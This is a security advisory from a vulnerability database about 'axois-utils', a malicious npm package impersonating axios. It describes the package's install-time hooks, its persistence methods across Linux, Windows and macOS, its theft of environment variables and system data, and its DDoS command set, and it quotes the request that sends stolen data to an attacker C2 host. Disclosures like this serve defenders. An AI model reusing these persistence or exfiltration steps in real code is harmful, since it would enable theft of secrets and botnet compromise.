VDB
GCVE-110-OSM-2026-4319
GCVE-110-OSM-2026-4319
Advisory PublishedCVSS 9.6/10
Installs a cross-platform DDoS botnet client (PhantomBot) at npm install time via a preinstall/install/postinstall triple hook, establishing persistence on Linux (crontab @reboot, rc.local, systemd phantom-bot.service), Windows (HKCU Run key 'SystemUpdate', schtasks onlogon), and macOS (LaunchAgent com.phantom.bot.plist), then exfiltrates full system information including all environment variables, network interfaces, hostname, and username to attacker C2 at b94b6bcfa27554.lhr.life:443/collect before entering a 30-second polling loop receiving HTTP/HTTPS/TCP/UDP flood and HTTP/2 Rapid Reset DDoS commands. A compiled Go C2 server binary ('c2', 4MB ELF, built from /home/kali/npmbotnet) is co-bundled, implementing the operator-side bot management shell. Axios typosquat — 'axois' transposes 'io' in 'axios'; spoofed author metadata 'axios-contrib' with fake GitHub repo.
**Trigger** (`preinstall`/`install`/`postinstall`): all three hooks execute `node distrube.js` at install time.
**Collection**: `stealSystemInfo()` builds a JSON payload containing `BOT_ID`, public IP (fetched from `https://api.ipify.org`), `os.hostname()`, `os.platform()`, `os.arch()`, `os.userInfo().username`, `os.cpus().length`, `os.totalmem()`, `os.freemem()`, `os.networkInterfaces()` (all interface addresses), full `process.env`, `process.cwd()`, `os.homedir()`, `process.version`, and timestamp.
**Exfiltration**: `sendToC2()` POSTs via `https.request({ hostname: 'b94b6bcfa27554.lhr.life', port: 443, path: '/collect', method: 'POST', headers: { 'Content-Type': 'application/json', 'User-Agent': 'PhantomBot/1.0' } })`.
**Persistence** (`addPersistence()`): Linux — `crontab @reboot` (vmscan-confirmed), `/etc/rc.local` append (vmscan-confirmed), systemd user service `phantom-bot.service`, `.bashrc`/`.zshrc` append; Windows — `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` key `SystemUpdate`, Startup folder BAT `system-update.bat`, `schtasks /sc onlogon`; macOS — LaunchAgent `~/Library/LaunchAgents/com.phantom.bot.plist`.
**C2 polling** (`connectToC2()`): 30-second loop POSTing to `https://b94b6bcfa27554.lhr.life:443/`; `executeCommand()` dispatches: `http_flood`, `https_flood`, `tcp_flood`, `udp_flood`, `http2_rapid_reset`.
**Bundled C2 server binary**: `c2` (ELF x86_64, ~4MB, Go 1.26.1, unstripped) — operator-side bot management server. Build path `/home/kali/npmbotnet` embedded.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | axois-utils | 1.0.9 (affected) | — |
Browse GCVE Records
73,738 records in the GCVE database · Updated July 19, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.